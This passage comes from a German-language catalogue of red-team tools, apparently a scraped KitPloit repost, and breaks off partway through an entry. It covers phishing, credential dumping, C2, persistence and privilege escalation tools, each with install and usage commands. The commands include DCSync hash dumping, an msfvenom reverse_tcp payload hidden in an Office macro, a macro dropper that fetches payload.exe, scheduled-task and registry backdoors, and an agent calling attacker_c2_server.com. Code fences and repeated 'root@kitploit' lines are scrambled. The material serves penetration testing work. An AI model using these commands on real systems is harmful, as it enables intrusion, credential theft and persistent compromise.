  --debug               enable server debugging

image

🔙King Phisher

King Phisher ist ein Werkzeug, das Angreifern ermöglicht, Phishing-E-Mails zu erstellen und an Opfer zu senden, um vertrauliche Informationen zu erlangen.

Es bietet Funktionen wie anpassbare Vorlagen, Kampagnenverwaltung und E-Mail-Versandmöglichkeiten, was es zu einem leistungsstarken und benutzerfreundlichen Werkzeug für die Durchführung von Phishing-Angriffen macht. Mit King Phisher können Angreifer Einzelpersonen oder Organisationen mit gezielten und überzeugenden Phishing-E-Mails ins Visier nehmen, wodurch die Erfolgschancen ihrer Angriffe steigen.

Installation (Linux – Client & Server):```bash wget -q https://github.com/securestate/king-phisher/raw/master/tools/install.sh &&
sudo bash ./install.sh

root@kitploit:~
**Verwendung:**

Sobald King Phisher installiert ist, folgen Sie bitte der [Wiki-Seite](https://github.com/rsmusllp/king-phisher/wiki/Getting-Started), um SSH, die Datenbankkonfiguration, den SMTP-Server usw. einzurichten.

![image](https://assets.kitploit.com/production/public/readmes/495/ab8900f24709e60727b9ae8d91dc00da72eb17a099da35552cfd09ad542e20b5.png)

# Ausführung

---

[🔙](#tool-list)[Responder](https://github.com/SpiderLabs/Responder)

Responder ist ein Werkzeug zur Vergiftung der LLMNR- und NBT-NS-Protokolle in einem Netzwerk, um die Erfassung von Anmeldeinformationen und die Ausführung beliebigen Codes zu ermöglichen.

Die Protokolle LLMNR (Link-Local Multicast Name Resolution) und NBT-NS (NetBIOS Name Service) werden von Windows-Systemen verwendet, um Hostnamen in IP-Adressen in einem lokalen Netzwerk aufzulösen. Wenn ein Hostname mit diesen Protokollen nicht aufgelöst werden kann, sendet das System eine Broadcast-Anfrage für den Hostnamen an das lokale Netzwerk.

Responder hört auf diese Broadcasts und antwortet mit einer gefälschten IP-Adresse, wodurch das anfragende System dazu gebracht wird, seine Anmeldeinformationen an den Angreifer zu senden.

**Installation:**```bash
git clone https://github.com/SpiderLabs/Responder#usage
cd Responder

Verwendung:```bash

Running the tool

./Responder.py [options]

Typical usage

./Responder.py -I eth0 -wrf

root@kitploit:~
Full usage information can be found [here](https://github.com/SpiderLabs/Responder#usage).

![image](https://assets.kitploit.com/production/public/readmes/495/1557d2d9375fcf140ae01d21311d11ce93eabb676e40f6eb39ec25e0f4959c12.png)

_Bild verwendet von https://www.4armed.com/blog/llmnr-nbtns-poisoning-using-responder/_

### [🔙](#tool-list)[secretsdump](https://github.com/fortra/impacket/blob/master/examples/secretsdump.py)

Ein Dienstprogramm, das Teil der Impacket-Bibliothek ist und zum Extrahieren von Passwort-Hashes und anderen Geheimnissen aus einem Windows-System verwendet werden kann.

Es interagiert dazu mit der Security Account Manager (SAM)-Datenbank auf dem System und extrahiert die gehashten Passwörter und andere Informationen, wie z. B.:

- Passwort-Hashes für lokale Konten
- Kerberos-Tickets und -Schlüssel
- LSA-Geheimnisse

**Installation:**```bash
python3 -m pip install impacket

Verwendung:```bash

Extract NTLM hashes with local files

secretsdump.py -ntds /root/ntds_cracking/ntds.dit -system /root/ntds_cracking/systemhive LOCAL

DCSync attack and dump the NTLM hashes of all domain users.

secretsdump.py -dc-ip 10.10.10.30 MEGACORP.LOCAL/svc_bes:[email protected]

root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/495/e9e242c346297388c540da63c467f568ea0b33980e52d48bd8154d745147f192.png)

_Bild verwendet von https://riccardoancarani.github.io/2020-05-10-hunting-for-impacket/#secretsdumppy_

### [🔙](#tool-list)[evil-winrm](https://github.com/Hackplayers/evil-winrm)

Evil-WinRM ist ein Tool, das eine Befehlszeilenschnittstelle für Windows Remote Management (WinRM: _Ein Dienst, der Administratoren die Remote-Ausführung von Befehlen auf einem Windows-Rechner ermöglicht_) bereitstellt.

Evil-WinRM ermöglicht es einem Angreifer, sich per WinRM remote mit einem Windows-Rechner zu verbinden und beliebige Befehle auszuführen.

Zu den Funktionen gehören:

- Laden von Powershell-Skripten in den Arbeitsspeicher
- Laden von DLL-Dateien in den Arbeitsspeicher, wodurch einige AVs umgangen werden
- Laden von x64-Payloads
- Pass-the-Hash-Unterstützung
- Hoch- und Herunterladen lokaler und entfernter Dateien

**Installation: (Git)**```bash
sudo gem install winrm winrm-fs stringio logger fileutils
git clone https://github.com/Hackplayers/evil-winrm.git
cd evil-winrm

Installation: (Ruby gem)```bash gem install evil-winrm

root@kitploit:~
Alternative Installationsanleitungen finden Sie [hier](https://github.com/Hackplayers/evil-winrm#installation--quick-start-4-methods).

**Verwendung:**```bash
# Connect to 192.168.1.100 as Administrator with custom exe/ps1 download folder locations
evil-winrm  -i 192.168.1.100 -u Administrator -p 'MySuperSecr3tPass123!' -s '/home/foo/ps1_scripts/' -e '/home/foo/exe_files/'

# Upload local files to victim
upload local_filename
upload local_filename destination_filename

# Download remote files to local machine
download remote_filename
download remote_filename destination_filename

# Execute .Net assembly into victim memory
Invoke-Binary /opt/csharp/Rubeus.exe

# Load DLL library into victim memory
Dll-Loader -http http://10.10.10.10/SharpSploit.dll

Full usage documentation can be found here.

image

Bild verwendet von https://korbinian-spielvogel.de/posts/heist-writeup/

🔙Donut

Ein Werkzeug zur Ausführung von VBScript-, JScript-, EXE-, DLL-Dateien und dotNET-Assemblys im Arbeitsspeicher. Es kann verwendet werden, um benutzerdefinierte Payloads auf Zielsystemen zu laden und auszuführen, ohne dass Dateien auf die Festplatte geschrieben werden müssen.

Installation: (Windows)```bash git clone http://github.com/thewover/donut.git

root@kitploit:~
Um die Loader-Vorlage, die dynamische Bibliothek donut.dll, die statische Bibliothek donut.lib und den Generator donut.exe zu erstellen. Starten Sie eine x64 Microsoft Visual Studio Developer-Eingabeaufforderung, wechseln Sie in das Verzeichnis, in das Sie das Donut-Repository geklont haben, und geben Sie Folgendes ein:```bash
nmake -f Makefile.msvc

Um dasselbe zu tun, außer mit MinGW-64 unter Windows oder Linux, wechseln Sie in das Verzeichnis, in das Sie das Donut-Repository geklont haben, und geben Sie Folgendes ein:```bash make -f Makefile.mingw

root@kitploit:~
**Installieren: (Linux)**```bash
pip3 install donut-shellcode

Verwendung:```bash

Creating shellcode from an XSL file that pops up a calculator.

shellcode = donut.create(file=r"C:\Tools\Source\Repos\donut\calc.xsl")

Creating shellcode from an unmanaged DLL. Invokes DLLMain.

shellcode = donut.create(file=r"C:\Tools\Source\Repos\donut\payload\test\hello.dll")

root@kitploit:~
Ausführliche Nutzungsinformationen finden Sie auf der donut [GitHub-Seite](https://github.com/TheWover/donut/#4-usage).

Weitere Informationen finden Sie in [einem aktuellen Blogbeitrag](https://thewover.github.io/Bear-Claw/) von The Wover.

![image](https://assets.kitploit.com/production/public/readmes/495/f1dba24c73e1bc864c83173904c6592faee2f8aa854da293767b90d69449d5c4.png)

### [🔙](#tool-list)[Macro_pack](https://github.com/sevagas/macro_pack)

Ein Tool zur Automatisierung der Verschleierung und Generierung von Office-Dokumenten, VB-Skripten, Verknüpfungen und anderen Formaten für Red Teaming.

**Installation: (Binär)**

1. Holen Sie sich die neueste Binärdatei von [https://github.com/sevagas/macro_pack/releases/](https://github.com/sevagas/macro_pack/releases/)
2. Laden Sie die Binärdatei auf einem PC mit installiertem originalem Microsoft Office herunter.
3. Öffnen Sie die Konsole, wechseln Sie mit CD in das Binärverzeichnis und rufen Sie die Binärdatei auf.

**Installation: (Git)**```bash
git clone https://github.com/sevagas/macro_pack.git
cd macro_pack
pip3 install -r requirements.txt

Verwendung:```bash

Help Page

python3 macro_pack.py --help

List all supported file formats

macro_pack.exe --listformats

Obfuscate the vba file generated by msfvenom and puts result in a new VBA file.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.5 -f vba | macro_pack.exe -o -G meterobf.vba

Obfuscate Empire stager VBA file and generate a MS Word document:

macro_pack.exe -f empire.vba -o -G myDoc.docm

Generate an MS Excel file containing an obfuscated dropper (download payload.exe and store as dropped.exe)

echo "https://myurl.url/payload.exe" "dropped.exe" | macro_pack.exe -o -t DROPPER -G "drop.xlsm"

Execute calc.exe via Dynamic Data Exchange (DDE) attack

echo calc.exe | macro_pack.exe --dde -G calc.xslx

root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/495/05a46a14fba117c71b6b79cec0cccbc403531a302add46b9e55035e7d9d634ef.png)

### [🔙](#tool-list)[PowerSploit](https://github.com/PowerShellMafia/PowerSploit)

Eine Sammlung von PowerShell-Skripten und -Modulen, die verwendet werden können, um eine Vielzahl von Red-Teaming-Zielen zu erreichen.

Einige der Funktionen von PowerSploit:

- Passwort-Hashes auslesen und Klartext-Passwörter aus dem Speicher extrahieren
- Rechte erweitern und Sicherheitskontrollen umgehen
- Beliebigen PowerShell-Code ausführen und Ausführungsbeschränkungen umgehen
- Netzwerk-Rekognoszierung und -Erkundung durchführen
- Payloads generieren und Exploits ausführen

**Installation:** _1. Im PowerShell-Module-Ordner speichern_

Zuerst müssen Sie den [PowerSploit-Ordner](https://github.com/PowerShellMafia/PowerSploit) herunterladen und in Ihrem PowerShell-Module-Ordner speichern.

Den Pfad zu Ihrem PowerShell-Module-Ordner finden Sie mit folgendem Befehl:```
$Env:PSModulePath

Installieren: 2. PowerSploit als PowerShell-Modul installieren

Sie müssen dann das PowerSploit-Modul installieren (verwenden Sie den Namen des heruntergeladenen Ordners).

Hinweis: Ihre PowerShell-Ausführungsrichtlinie könnte Sie blockieren. Führen Sie den folgenden Befehl aus, um dies zu beheben.``` powershell.exe -ep bypass

root@kitploit:~
Jetzt können Sie das PowerSploit-Modul installieren.```
Import-Module PowerSploit

Verwendung:``` Get-Command -Module PowerSploit

root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/495/be1d37fac661a710be1a2268f5f0090e13b496c05f8d22b56d47e166072e5fff.png)

### [🔙](#tool-list)[Rubeus](https://github.com/GhostPack/Rubeus)

Ein Tool, das verwendet werden kann, um verschiedene Aktionen im Zusammenhang mit Microsoft Active Directory (AD)-Umgebungen durchzuführen, wie das Auslesen von Passwort-Hashes, das Erstellen/Löschen von Benutzern und das Ändern von Benutzereigenschaften.

Einige der Funktionen von Rubeus:

- Kerberoasting
- Golden ticket attacks
- Silver ticket attacks

**Installation: (Download)**

Sie können das inoffizielle vorkompilierte Rubeus-Binary [hier](https://github.com/r3motecontrol/Ghostpack-CompiledBinaries/blob/master/Rubeus.exe) installieren.

**Installation: (Kompilieren)**

Rubeus ist kompatibel mit [Visual Studio 2019 Community Edition](https://visualstudio.microsoft.com/vs/community/). Öffnen Sie das Rubeus-[Projekt .sln](https://github.com/GhostPack/Rubeus), wählen Sie „Release“ und erstellen Sie es.

**Verwendung:**```
Rubeus.exe -h

image

🔙SharpUp

Ein nützliches Tool zur Überprüfung eines Opfer-Endpunkts auf Schwachstellen im Zusammenhang mit Prozessen mit hoher Integrität, Gruppen, kaperbaren Pfaden usw.

Installation: (Herunterladen)

Sie können die inoffizielle, vorkompilierte SharpUp-Binärdatei hier installieren.

Installation: (Kompilieren)

SharpUp ist kompatibel mit Visual Studio 2015 Community Edition. Öffnen Sie die SharpUp Projektmappe (.sln), wählen Sie "Release" und erstellen Sie die Lösung.

Verwendung:```bash SharpUp.exe audit #-> Runs all vulnerability checks regardless of integrity level or group membership.

SharpUp.exe HijackablePaths #-> Check only if there are modifiable paths in the user's %PATH% variable.

SharpUp.exe audit HijackablePaths #-> Check only for modifiable paths in the user's %PATH% regardless of integrity level or group membership.

root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/495/881494f39c898e7951e05d177aeaef111636ae85c7a4c9a607f337e3318f7d77.png)

### [🔙](#tool-list)[SQLRecon](https://github.com/skahwah/SQLRecon)

MS-SQL (Microsoft SQL Server) ist ein von Microsoft entwickeltes und vertriebenes relationales Datenbankmanagementsystem.

Dieses C# MS-SQL-Toolkit wurde für offensive Aufklärung und Post-Exploitation entwickelt. Detaillierte Informationen zu den einzelnen Techniken finden Sie im [Wiki](https://github.com/skahwah/SQLRecon/wiki).

**Installation: (Binary)**

Sie können die neueste Binärversion von [hier](https://github.com/skahwah/SQLRecon/releases) herunterladen.

**Verwendung:**```bash
# Authenticating using Windows credentials
SQLRecon.exe -a Windows -s SQL01 -d master -m whoami

# Authenticating using Local credentials
SQLRecon.exe -a Local -s SQL02 -d master -u sa -p Password123 -m whoami

# Authenticating using Azure AD credentials
SQLRecon.exe -a azure -s azure.domain.com -d master -r domain.com -u skawa -p Password123 -m whoami

# Run whoami
SQLRecon.exe -a Windows -s SQL01 -d master -m whoami

# View databases
SQLRecon.exe -a Windows -s SQL01 -d master -m databases

# View tables
SQLRecon.exe -a Windows -s SQL01 -d master -m tables -o AdventureWorksLT2019

Vollständige Nutzungsinformationen finden Sie im Wiki.

Informationen zur Verwendung der Toolmodule finden Sie hier.

image

Bild verwendet von der SQLRecon-Hilfeseite

🔙UltimateAppLockerByPassList

Diese Ressource ist eine Sammlung der gängigsten und bekanntesten Techniken zur Umgehung von AppLocker.

Da AppLocker auf verschiedene Arten konfiguriert werden kann, pflegt @api0cradle eine verifizierte Liste von Umgehungen (die gegen die standardmäßigen AppLocker-Regeln funktioniert) und eine Liste mit möglichen Umgehungstechniken (abhängig von der Konfiguration) oder solchen, die von jemandem als Umgehung behauptet werden.

Sie haben auch eine Liste generischer Umgehungstechniken sowie eine Legacy-Liste von Methoden zur Ausführung über DLLs.

Indizierte Listen

  • Generic-AppLockerbypasses.md
  • VerifiedAppLockerBypasses.md
  • UnverifiedAppLockerBypasses.md
  • DLL-Execution.md

image

Bild verwendet von https://github.com/api0cradle/UltimateAppLockerByPassList

🔙StarFighters

Ein auf JavaScript und VBScript basierender Empire-Launcher, der in einem eigenen eingebetteten PowerShell-Host läuft.

Beide Launcher laufen im eigenen eingebetteten PowerShell-Host, sodass wir PowerShell.exe nicht benötigen.

Dies kann nützlich sein, wenn ein Unternehmen PowerShell.exe blockiert und/oder eine Anwendungs-Whitelisting-Lösung verwendet, aber das Ausführen von JS/VBS-Dateien nicht blockiert.

Verwendung:

  • Richten Sie einen neuen Listener in PowerShell Empire ein
  • Verwenden Sie den Launcher-Befehl, um einen PowerShell-Launcher für diesen Listener zu generieren
  • Kopieren und ersetzen Sie den Base64-kodierten Launcher-Payload in der StarFighter-JavaScript- oder VBScript-Datei

Für die JavaScript-Version verwenden Sie die folgende Variable:```javascript var EncodedPayload = "";

root@kitploit:~
Für die VBScript-Version verwenden Sie die folgende Variable:```vbscript
  Dim EncodedPayload: EncodedPayload = "<Paste Encoded Launcher Payload Here>"
  • Dann führe aus: wscript.exe StarFighter.js oder StarFighter.vbs auf dem Ziel aus, oder doppelklicke die Starter im Explorer.

image

Bild verwendet von https://www.hackplayers.com/2017/06/startfighters-un-launcher-de-empire-en-js-vbs.html

🔙demiguise

Das Ziel dieses Projekts ist es, .html-Dateien zu generieren, die eine verschlüsselte HTA-Datei enthalten.

Die Idee ist, dass beim Besuch der Seite durch das Ziel der Schlüssel abgerufen wird und die HTA dynamisch im Browser entschlüsselt und direkt an den Benutzer weitergeleitet wird.

Dies ist eine Umgehungstechnik, um die von einigen Sicherheitsappliances implementierte Inhalts-/Dateityp-Überprüfung zu umgehen.

Weitere technische Informationen hier.

Installation:``` git clone https://github.com/nccgroup/demiguise cd demiguise

root@kitploit:~
**Verwendung:**```bash
# Generate an encrypted .hta file that executes notepad.exe
python demiguise.py -k hello -c "notepad.exe" -p Outlook.Application -o test.hta

image

Bild verwendet von https://github.com/nccgroup/demiguise

Persistenz

🔙Impacket

Impacket bietet eine Reihe von Low-Level-Python-Bindings für verschiedene Netzwerkprotokolle, darunter SMB, Kerberos und LDAP, sowie höherstufige Bibliotheken für die Interaktion mit Netzwerkdiensten und die Durchführung spezifischer Aufgaben wie das Auslesen von Passwort-Hashes und das Erstellen von Netzwerkfreigaben.

Es enthält außerdem eine Reihe von Befehlszeilentools, mit denen verschiedene Aufgaben ausgeführt werden können, wie das Auslesen von SAM-Datenbanken, das Auflisten von Domänenvertrauensstellungen und das Knacken von Windows-Passwörtern.

Installation:```bash python3 -m pip install impacket

root@kitploit:~
**Installation: (mit Beispielskripten)**

Laden Sie [das Paket](https://github.com/fortra/impacket) herunter und entpacken Sie es, navigieren Sie dann zum Installationsverzeichnis und führen Sie ... aus```bash
python3 -m pip install .

Verwendung:```bash

Extract NTLM hashes with local files

secretsdump.py -ntds /root/ntds_cracking/ntds.dit -system /root/ntds_cracking/systemhive LOCAL

Gets a list of the sessions opened at the remote hosts

netview.py domain/user:password -target 192.168.10.2

Retrieves the MSSQL instances names from the target host.

mssqlinstance.py 192.168.1.2

This script will gather data about the domain's users and their corresponding email addresses.

GetADUsers.py domain/user:password@IP

root@kitploit:~
Great [Spickzettel](https://cheatsheet.haax.fr/windows-systems/exploitation/impacket/) für die Impacket-Nutzung.

![image](https://assets.kitploit.com/production/public/readmes/495/2be6291c92daeeea07d0afe27bcf2ecde2bd9676d07e84e8b7c6ee823887e902.png)

### [🔙](#tool-list)[Empire](https://github.com/EmpireProject/Empire)

Empire ist ein Post-Exploitation-Framework, mit dem Sie Payloads generieren können, um Remote-Verbindungen zu Opfersystemen herzustellen.

Sobald ein Payload auf einem Opfersystem ausgeführt wurde, stellt es eine Verbindung zum Empire-Server her, der dann verwendet werden kann, um Befehle zu erteilen und das Zielsystem zu kontrollieren.

Empire enthält außerdem eine Reihe integrierter Module und Skripte, die zur Durchführung spezifischer Aufgaben verwendet werden können, wie z. B. das Auslesen von Passwort-Hashes, den Zugriff auf die Windows-Registrierung und das Exfiltrieren von Daten.

**Installation:**```bash
git clone https://github.com/EmpireProject/Empire
cd Empire
sudo ./setup/install.sh

Verwendung:```bash

Start Empire

./empire

List live agents

list agents

List live listeners

list listeners

root@kitploit:~
Nützlicher Spickzettel [cheat sheet](https://github.com/HarmJ0y/CheatSheets/blob/master/Empire.pdf) von [HarmJoy](https://github.com/HarmJ0y).

![image](https://assets.kitploit.com/production/public/readmes/495/3dec2ca6692f2b6431159a32830e854fa994824b8bcf12c797c0bda8a186519d.png)

### [🔙](#tool-list)[SharPersist](https://github.com/mandiant/SharPersist)

Ein Windows-Persistenz-Toolkit, geschrieben in C#.

Das Projekt hat ein [Wiki](https://github.com/mandiant/SharPersist/wiki).

**Installation: (Binary)**

Sie finden die neueste Version [hier](https://github.com/mandiant/SharPersist/releases).

**Installation: (Kompilieren)**

- Laden Sie die Projektdateien aus dem [GitHub-Repo](https://github.com/mandiant/SharPersist) herunter.
- Laden Sie das Visual Studio-Projekt und gehen Sie zu "Tools" --> "NuGet Package Manager" --> "Package Manager Settings"
- Gehen Sie zu "NuGet Package Manager" --> "Package Sources"
- Fügen Sie eine Paketquelle mit der URL "https://api.nuget.org/v3/index.json" hinzu
- Installieren Sie das NuGet-Paket Costura.Fody. Die ältere Version von Costura.Fody (3.3.3) wird benötigt, damit Sie kein Visual Studio 2019 benötigen.
  - `Install-Package Costura.Fody -Version 3.3.3`
- Installieren Sie das TaskScheduler-Paket
  - `Install-Package TaskScheduler -Version 2.8.11`
- Sie können das Projekt jetzt selbst erstellen!

**Verwendung:**

Eine vollständige Liste der Verwendungsbeispiele finden Sie [hier](https://github.com/mandiant/SharPersist#adding-persistence-triggers-add).```
#KeePass
SharPersist -t keepass -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -f "C:\Users\username\AppData\Roaming\KeePass\KeePass.config.xml" -m add

#Registry
SharPersist -t reg -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -k "hkcurun" -v "Test Stuff" -m add

#Scheduled Task Backdoor
SharPersist -t schtaskbackdoor -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Something Cool" -m add

#Startup Folder
SharPersist -t startupfolder -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -f "Some File" -m add

image

🔙ligolo-ng

Ligolo-ng ist ein einfaches, leichtes und schnelles Tool, das es Pentestern ermöglicht, Tunnel über eine reverse TCP/TLS-Verbindung unter Verwendung einer tun-Schnittstelle aufzubauen (ohne die Notwendigkeit von SOCKS).

Anstatt einen SOCKS-Proxy oder TCP/UDP-Weiterleitungen zu verwenden, erstellt Ligolo-ng einen Userspace-Netzwerkstack mit Gvisor.

Beim Ausführen des Relay/Proxy-Servers wird eine tun-Schnittstelle verwendet; Pakete, die an diese Schnittstelle gesendet werden, werden übersetzt und dann an das entfernte Netzwerk des Agents übertragen.

Installation: (Download)

Vorkompilierte Binärdateien (Windows/Linux/macOS) sind auf der Release-Seite verfügbar.

Installation: (Erstellen)

Ligolo-ng erstellen (Go >= 1.17 erforderlich):```bash go build -o agent cmd/agent/main.go go build -o proxy cmd/proxy/main.go

Build for Windows

GOOS=windows go build -o agent.exe cmd/agent/main.go GOOS=windows go build -o proxy.exe cmd/proxy/main.go

root@kitploit:~
**Einrichtung: (Linux)**```bash
sudo ip tuntap add user [your_username] mode tun ligolo
sudo ip link set ligolo up

Einrichtung: (Windows)

Sie müssen den Wintun-Treiber herunterladen (verwendet von WireGuard) und die wintun.dll im selben Ordner wie Ligolo ablegen (stellen Sie sicher, dass Sie die richtige Architektur verwenden).

Einrichtung: (Proxy-Server)```bash ./proxy -h # Help options ./proxy -autocert # Automatically request LetsEncrypt certificates

root@kitploit:~
**Verwendung:**

_Starten Sie den Agenten auf dem Zielcomputer (Opfercomputer) (keine Berechtigungen erforderlich!):_```bash
./agent -connect attacker_c2_server.com:11601

Eine Sitzung sollte auf dem Proxy-Server erscheinen.``` INFO[0102] Agent joined. name=nchatelain@nworkstation remote="XX.XX.XX.XX:38000"

root@kitploit:~
Verwenden Sie den session-Befehl, um den Agenten auszuwählen.```
ligolo-ng » session
? Specify a session : 1 - nchatelain@nworkstation - XX.XX.XX.XX:38000

Die vollständige Nutzungsinformationen finden Sie hier.

image

Bild verwendet von https://github.com/nicocha30/ligolo-ng#demo

Privilegieneskalation

🔙LinPEAS

LinPEAS ist ein schönes, ausführliches Tool zur Privilegieneskalation, um lokale Privesc-Pfade auf Linux-Endpunkten zu finden.

Installation + Verwendung:```bash curl -L "https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh" | sh

root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/495/75977a81eeb607a2ef06b8524e1792579aa3dc5b245596ee7eeed5938d75f279.png)

### [🔙](#tool-list)[WinPEAS](https://github.com/carlospolop/PEASS-ng/tree/master/winPEAS)

WinPEAS ist ein schönes, ausführliches Privilegieneskalations-Tool zum Auffinden lokaler Privesc-Pfade auf Windows-Endpunkten.

**Installation + Verwendung:**```bash
$wp=[System.Reflection.Assembly]::Load([byte[]](Invoke-WebRequest "https://github.com/carlospolop/PEASS-ng/releases/latest/download/winPEASany_ofs.exe" -UseBasicParsing | Select-Object -ExpandProperty Content)); [winPEAS.Program]::Main("")

image

🔙linux-smart-enumeration

Linux smart enumeration ist ein weiteres gutes, weniger ausführliches Linux-Privesc-Tool für Linux.

Installation + Verwendung:```bash curl "https://github.com/diego-treitos/linux-smart-enumeration/releases/latest/download/lse.sh" -Lo lse.sh;chmod 700 lse.sh

root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/495/0d46a6a3c94f9ce73617ebb098962e9d6d630489e557e57adba93bd24d562808.png)

### [🔙](#tool-list)[Certify](https://github.com/GhostPack/Certify)

Certify ist ein C#-Tool, um Fehlkonfigurationen in Active Directory Certificate Services (AD CS) aufzulisten und auszunutzen.

Certify ist dafür ausgelegt, zusammen mit anderen Red-Team-Tools und -Techniken wie Mimikatz und PowerShell eingesetzt zu werden, um Red Teamern die Durchführung verschiedener Angriffsarten zu ermöglichen, darunter Man-in-the-Middle-Angriffe, Identitätswechselangriffe und Privilegieneskalationsangriffe.

**Hauptfunktionen von Certify:**

- Zertifikaterstellung
- Zertifikatsignierung
- Zertifikatimport
- Zertifikatvertrauensänderung

**Installation: (Kompilieren)**

Certify ist kompatibel mit [Visual Studio 2019 Community Edition](https://visualstudio.microsoft.com/vs/community/). Öffnen Sie das Certify-Projekt [.sln](https://github.com/GhostPack/Certify), wählen Sie "Release" und erstellen Sie es.

**Installation: (Certify über PowerShell ausführen)**

Wenn Sie Certify über einen PowerShell-Wrapper im Arbeitsspeicher ausführen möchten, kompilieren Sie zunächst Certify und codieren Sie die resultierende Assembly base64:```bash
[Convert]::ToBase64String([IO.File]::ReadAllBytes("C:\Temp\Certify.exe")) | Out-File -Encoding ASCII C:\Temp\Certify.txt

Certify kann dann in einem PowerShell-Skript mit folgendem Befehl geladen werden (wobei "aa..." durch den base64-codierten Certify-Assembly-String ersetzt wird):``` $CertifyAssembly = [System.Reflection.Assembly]::Load([Convert]::FromBase64String("aa..."))

root@kitploit:~
Die Main()-Methode und beliebige Argumente können dann wie folgt aufgerufen werden:```
[Certify.Program]::Main("find /vulnerable".Split())

Vollständige Kompilierungsanweisungen finden Sie hier.

Verwendung:```bash

See if there are any vulnerable templates

Certify.exe find /vulnerable

Request a new certificate for a template/CA, specifying a DA localadmin as the alternate principal

Certify.exe request /ca:dc.theshire.local\theshire-DC-CA /template:VulnTemplate /altname:localadmin

root@kitploit:~
Eine vollständige Beispiel-Walkthrough finden Sie [hier](https://github.com/GhostPack/Certify#example-walkthrough).

![image](https://assets.kitploit.com/production/public/readmes/495/d984105311fed30083e84cdfaa7b63d2f22b85f5dbb448a7162e102241203e1f.png)

### [🔙](#tool-list)[Get-GPPPassword](https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Get-GPPPassword.ps1)

Get-GPPPassword ist ein PowerShell-Skript, das Teil des PowerSploit-Toolkits ist. Es wurde entwickelt, um Passwörter für lokale Konten abzurufen, die mithilfe von Gruppenrichtlinienpräferenzen (GPP) erstellt und verwaltet werden.

Get-GPPPassword durchsucht den SYSVOL-Ordner auf dem Domänencontroller nach GPP-Dateien, die Passwortinformationen enthalten. Sobald es diese Dateien findet, entschlüsselt es die Passwortinformationen und zeigt sie dem Benutzer an.

**Install:**

Folgen Sie den PowerSploit [Installationsanweisungen](https://github.com/A-poc/RedTeam-Tools#powersploit) aus diesem Toolblatt.```bash
powershell.exe -ep bypass
Import-Module PowerSploit

Verwendung:```bash

Get all passwords with additional information

Get-GPPPassword

Get list of all passwords

Get-GPPPassword | ForEach-Object {$_.passwords} | Sort-Object -Uniq

root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/495/2274ad1205f7c6b2db0c3511427e21868bb0d4ba5e2bad1171156819ce417662.png)

### [🔙](#tool-list)[Sherlock](https://github.com/rasta-mouse/Sherlock)

PowerShell-Skript, um schnell fehlende Software-Patches für lokale Privilegieneskalations-Schwachstellen zu finden.

_Unterstützt:_

- MS10-015 : User Mode to Ring (KiTrap0D)
- MS10-092 : Task Scheduler
- MS13-053 : NTUserMessageCall Win32k Kernel Pool Overflow
- MS13-081 : TrackPopupMenuEx Win32k NULL Page
- MS14-058 : TrackPopupMenu Win32k Null Pointer Dereference
- MS15-051 : ClientCopyImage Win32k
- MS15-078 : Font Driver Buffer Overflow
- MS16-016 : 'mrxdav.sys' WebDAV
- MS16-032 : Secondary Logon Handle
- MS16-034 : Windows Kernel-Mode Drivers EoP
- MS16-135 : Win32k Elevation of Privilege
- CVE-2017-7199 : Nessus Agent 6.6.2 - 6.10.3 Priv Esc

**Installation: (PowerShell)**```bash
# Git install
git clone https://github.com/rasta-mouse/Sherlock

# Load powershell module
Import-Module -Name C:\INSTALL_LOCATION\Sherlock\Sherlock.ps1

Verwendung: (PowerShell)```bash

Run all functions

Find-AllVulns

Run specific function (MS14-058 : TrackPopupMenu Win32k Null Pointer Dereference)

Find-MS14058

root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/495/0a46401aa0ece2211b30e76a9d2138453ec5f98cfb69416a2607084c10612993.png)

_Bild verwendet von https://vk9-sec.com/sherlock-find-missing-windows-patches-for-local-privilege-escalation/_

### [🔙](#tool-list)[Watson](https://github.com/rasta-mouse/Watson)

Watson ist ein .NET-Tool, das fehlende KBs auflistet und Exploits für Privilege Escalation-Schwachstellen vorschlägt.

Ideal zum Identifizieren fehlender Patches und Vorschlagen von Exploits, die zur Ausnutzung bekannter Schwachstellen verwendet werden können, um höhere Berechtigungen auf dem System zu erlangen.

**Installation:**

Verwenden Sie die [Visual Studio 2019 Community Edition](https://visualstudio.microsoft.com/vs/community/). Öffnen Sie die [Watson-Projektmappe .sln](https://github.com/rasta-mouse/Watson), wählen Sie "Release" und erstellen Sie das Projekt.

**Verwendung:**```bash
# Run all checks
Watson.exe

image

Bildtext verwendet von https://github.com/rasta-mouse/Watson#usage

🔙ImpulsiveDLLHijack

Ein auf C# basierendes Tool, das den Prozess des Auffindens und Ausnutzens von DLL-Hijacks in Zielbinärdateien automatisiert.

Die entdeckten gehijackten Pfade können während eines Einsatzes genutzt werden, um EDRs zu umgehen.

Installation:

  • Procmon.exe -> https://docs.microsoft.com/en-us/sysinternals/downloads/procmon
  • Benutzerdefinierte Bestätigungs-DLLs :
    • Dies sind DLL-Dateien, die dem Tool helfen, die Bestätigung zu erhalten, ob die DLLs erfolgreich aus dem identifizierten Hijack-Pfad geladen wurden
    • Kompiliert aus dem oben bereitgestellten MalDLL-Projekt (oder verwenden Sie die vorkompilierten Binärdateien, wenn Sie mir vertrauen!)
    • Der Name der 32-Bit-DLL sollte lauten: maldll32.dll
    • Der Name der 64-Bit-DLL sollte lauten: maldll64.dll
    • NuGet-Paket installieren: PeNet -> https://www.nuget.org/packages/PeNet/ (Voraussetzung beim Kompilieren des ImpulsiveDLLHijack-Projekts)

Hinweis: Die Voraussetzungen i & ii sollten im Verzeichnis der ImpulsiveDLLHijacks.exe selbst abgelegt werden.

  • Build- und Setup-Informationen:

    • ImpulsiveDLLHijack

      • Klonen Sie das Repository in Visual Studio
